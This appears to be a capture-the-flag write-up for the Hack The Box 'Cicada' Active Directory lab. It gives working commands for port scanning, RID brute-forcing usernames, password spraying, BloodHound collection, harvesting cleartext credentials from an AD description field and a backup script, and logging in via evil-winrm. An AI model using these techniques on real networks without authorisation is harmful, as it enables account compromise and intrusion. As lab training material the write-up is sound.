TCP Scan#

ip=10.129.64.252
nmap -sCV -p- -vv -A -T5 -oA scan/normal $ip

Based on the TCP scan results, the following ports are available for further assessment:

The scan reveals several open ports associated with Windows services, including Kerberos (port 88), which is used for authentication in Active Directory environments, and MSRPC (port 135), which facilitates inter-process communication on networked systems. Additionally, LDAP (ports 389, 636, 3268, and 3269) is present, which is utilized for directory services queries and authentication.

Other notable services include Kpasswd (port 464), used for Kerberos password changes, and SMB (ports 139 and 445), which provides file and printer sharing. These open ports indicate the presence of Active Directory services, warranting further enumeration to identify potential attack vectors.

Also, we can see the Domain name and the Domain Controller, so let’s add them to our /etc/hosts file:

echo "$ip CICADA-DC.cicada.htb cicada.htb" | sudo tee -a /etc/hosts

UDP scan#

./udpz $ip --retries 1 --timeout 20000

Based on the UDP scan results, no open ports were identified for further assessment.

Finding The Mysterious New Employee#

Now that we have a password, all we need is a username. Let’s leverage our read rights on the IPC$ share to dump the usernames on the system by brute-forcing their RIDs :

nxc smb cicada.htb -u 'guest' -p '' --rid-brute | tee usernames.txt

cat usernames.txt | awk -F'\\' '/SidTypeUser/{print $2}' | awk '{print $1}' > usernames.list

After cleaning the list to contain only the usernames, we can use it for a password spray attack. In this type of attack, the same password ('Cicada$M6Corpb*@Lp#nZp!8') is tested against multiple usernames, avoiding repeated failed attempts on a single account (which can trigger account lockout). The command below will attempt to authenticate with each username in the list using the specified password:

nxc smb cicada.htb -u usernames.list -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success

And We get a hit:

michael.wrightson:'Cicada$M6Corpb*@Lp#nZp!8'

Finding David’s Password#

Let’s see what we can use these credentials for:

nxc smb cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares

We can see that we have read access to the SYSVOL and NETLOGON shares, which we could use to dump LDAP data and generate information for BloodHound:

To do so, let’s first sync our time with the box:

sudo ntpdate $ip

And Now let’s generate the data:

python3 bloodhound.py --dns-tcp -ns $ip -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -c all

After uploading the generated data and reviewing the users I found, I noticed that David left his password in cleartext format in the Description field:

DAVID.ORELIOUS:'aRt$Lp#7t*VQ!3'

Evil Emily#

Now that we have new credentials, let’s do the same with them and see what we can use them for:

nxc smb cicada.htb -u 'DAVID.ORELIOUS' -p 'aRt$Lp#7t*VQ!3' --shares

We can see that we can finally read the DEV share:

smbclient //$ip/DEV -U 'DAVID.ORELIOUS'

Inside the DEV share, we have found a backup script, so let’s download it:

The script provides us with the cleartext credentials of Emily

emily.oscars:'Q!3@Lp#M6b*7t*Vt'

Let’s do the same as we did with the two previous users:

nxc smb cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --shares

We do have read (and write) permissions on the last two shares:

But most importantly, Emily can log in to the system:

nxc winrm cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Let’s log in and get our user flag:

evil-winrm -i cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'